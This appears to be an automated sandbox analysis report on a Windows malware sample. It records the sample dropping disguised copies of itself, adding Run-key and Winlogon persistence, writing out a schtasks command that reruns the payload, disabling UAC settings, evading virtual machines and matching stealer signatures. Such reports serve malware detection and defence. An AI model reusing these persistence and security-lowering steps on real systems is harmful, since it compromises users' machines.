Source: 4KjLUaW30K.exe, uLQtw4DjCF6t2UxoVc.cs High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'kxlYHrPx9', 'VJpOdacIicGjkiFTiQe', 'EKxtXLcUSAKeYtBQivI', 'vi2p0vcxWnnSmAgUO6F', 'Ohasv7cLgsGUbMZuE5e', 'kpFnAtcogebqDCaQTJM'
Source: 4KjLUaW30K.exe, qGVWVXVcX8NWKRCo2ot.cs High entropy of concatenated method names: 'IGD', 'CV5', 'z28PoytanZ', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Persistence and Installation Behavior

Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Recovery\System.exe
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe File created: C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Program Files (x86)\Windows Defender\dllhost.exe
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Users\Public\Downloads\ShellExperienceHost.exe
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe

Boot Survival

Source: C:\Users\user\Desktop\4KjLUaW30K.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Recovery\System.exe'" /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Memory allocated: EA0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Memory allocated: 1AA20000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Memory allocated: 1120000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Memory allocated: 1AF80000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Memory allocated: 15C0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Memory allocated: 1AF90000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Memory allocated: 1480000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Memory allocated: 1B230000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Memory allocated: 1390000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Memory allocated: 1AE60000 memory reserve | memory write watch
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: 860000 memory reserve | memory write watch
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: 1A570000 memory reserve | memory write watch
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: 8B0000 memory reserve | memory write watch
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: 1A780000 memory reserve | memory write watch
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: 29A0000 memory reserve | memory write watch
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: 1AB90000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Memory allocated: 11D0000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Memory allocated: 1AF90000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Memory allocated: F90000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Memory allocated: 1AE90000 memory reserve | memory write watch
Source: C:\Recovery\System.exe Memory allocated: A70000 memory reserve | memory write watch
Source: C:\Recovery\System.exe Memory allocated: 1A7F0000 memory reserve | memory write watch
Source: C:\Recovery\System.exe Memory allocated: 12D0000 memory reserve | memory write watch
Source: C:\Recovery\System.exe Memory allocated: 1AC70000 memory reserve | memory write watch
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: A20000 memory reserve | memory write watch
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: 1A4C0000 memory reserve | memory write watch
Source: C:\Recovery\System.exe Memory allocated: 1340000 memory reserve | memory write watch
Source: C:\Recovery\System.exe Memory allocated: 1AE30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 600000
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599883
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599767
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599651
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599532
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599412
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\System.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\System.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Window / User API: threadDelayed 1311
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Window / User API: threadDelayed 920
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Window / User API: threadDelayed 364
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Window / User API: threadDelayed 361
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Window / User API: threadDelayed 560
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Window / User API: threadDelayed 360
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Window / User API: threadDelayed 1481
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Window / User API: threadDelayed 916
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Window / User API: threadDelayed 364
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Window / User API: threadDelayed 364
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Window / User API: threadDelayed 361
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Window / User API: threadDelayed 367
Source: C:\Recovery\System.exe Window / User API: threadDelayed 367
Source: C:\Recovery\System.exe Window / User API: threadDelayed 373
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Window / User API: threadDelayed 638
Source: C:\Recovery\System.exe Window / User API: threadDelayed 768
Source: C:\Users\user\Desktop\4KjLUaW30K.exe TID: 6480 Thread sleep count: 1311 > 30
Source: C:\Users\user\Desktop\4KjLUaW30K.exe TID: 6480 Thread sleep count: 920 > 30
Source: C:\Users\user\Desktop\4KjLUaW30K.exe TID: 6220 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe TID: 7208 Thread sleep count: 364 > 30
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe TID: 5252 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe TID: 7468 Thread sleep count: 361 > 30
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe TID: 7284 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe TID: 7404 Thread sleep count: 560 > 30
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe TID: 7288 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe TID: 7548 Thread sleep count: 360 > 30
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe TID: 7472 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 7364 Thread sleep count: 1481 > 30
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052 Thread sleep time: -600000s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052 Thread sleep time: -599883s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 7356 Thread sleep count: 916 > 30
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052 Thread sleep time: -599767s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052 Thread sleep time: -599651s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052 Thread sleep time: -599532s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052 Thread sleep time: -599412s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 7812 Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 7340 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe TID: 7568 Thread sleep count: 364 > 30
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe TID: 7452 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe TID: 7624 Thread sleep count: 364 > 30
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe TID: 7492 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe TID: 7856 Thread sleep count: 361 > 30
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe TID: 7628 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe TID: 7964 Thread sleep count: 367 > 30
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe TID: 7688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\System.exe TID: 7916 Thread sleep count: 367 > 30
Source: C:\Recovery\System.exe TID: 7664 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\System.exe TID: 7908 Thread sleep count: 373 > 30
Source: C:\Recovery\System.exe TID: 7680 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8136 Thread sleep count: 308 > 30
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8136 Thread sleep count: 638 > 30
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8112 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\System.exe TID: 6204 Thread sleep count: 768 > 30
Source: C:\Recovery\System.exe TID: 8176 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\System.exe File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\System.exe File Volume queried: C:\ FullSizeInformation
Source: ae22e728c3f23233571eb704564b4445f7960812.exe.28.dr Binary or memory string: jmVMCiGkLa87XZ73uc8
Source: 4KjLUaW30K.exe, 00000000.00000002.2104263831.000000001BD54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2146148612.000000001B5C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Process token adjusted: Debug
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process token adjusted: Debug
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Process token adjusted: Debug
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Process token adjusted: Debug
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Process token adjusted: Debug
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Process token adjusted: Debug
Source: C:\Recovery\System.exe Process token adjusted: Debug
Source: C:\Recovery\System.exe Process token adjusted: Debug
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs"
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Queries volume information: C:\Users\user\Desktop\4KjLUaW30K.exe VolumeInformation
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Queries volume information: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Queries volume information: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Queries volume information: C:\Program Files (x86)\Windows Defender\dllhost.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Queries volume information: C:\Program Files (x86)\Windows Defender\dllhost.exe VolumeInformation
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Queries volume information: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe VolumeInformation
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Queries volume information: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe VolumeInformation
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Queries volume information: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe VolumeInformation
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Queries volume information: C:\Users\Public\Downloads\ShellExperienceHost.exe VolumeInformation
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Queries volume information: C:\Users\Public\Downloads\ShellExperienceHost.exe VolumeInformation
Source: C:\Recovery\System.exe Queries volume information: C:\Recovery\System.exe VolumeInformation
Source: C:\Recovery\System.exe Queries volume information: C:\Recovery\System.exe VolumeInformation
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Queries volume information: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe VolumeInformation
Source: C:\Recovery\System.exe Queries volume information: C:\Recovery\System.exe VolumeInformation
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created: PromptOnSecureDesktop 0
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2146148612.000000001B550000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: 0000001E.00000002.2180403115.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2187145311.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2074993070.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2234188359.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2187145311.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2159383737.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2187202631.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2180403115.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2172899315.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2155021661.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2159383737.000000000326D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2177147830.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2186040475.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2179948488.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2187202631.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2119361653.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2256735845.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2074993070.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2185482678.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2086148884.0000000012A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4KjLUaW30K.exe PID: 4564, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: audiodg.exe PID: 1488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: audiodg.exe PID: 6768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dllhost.exe PID: 7216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dllhost.exe PID: 7264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7316, type: MEMORYSTR
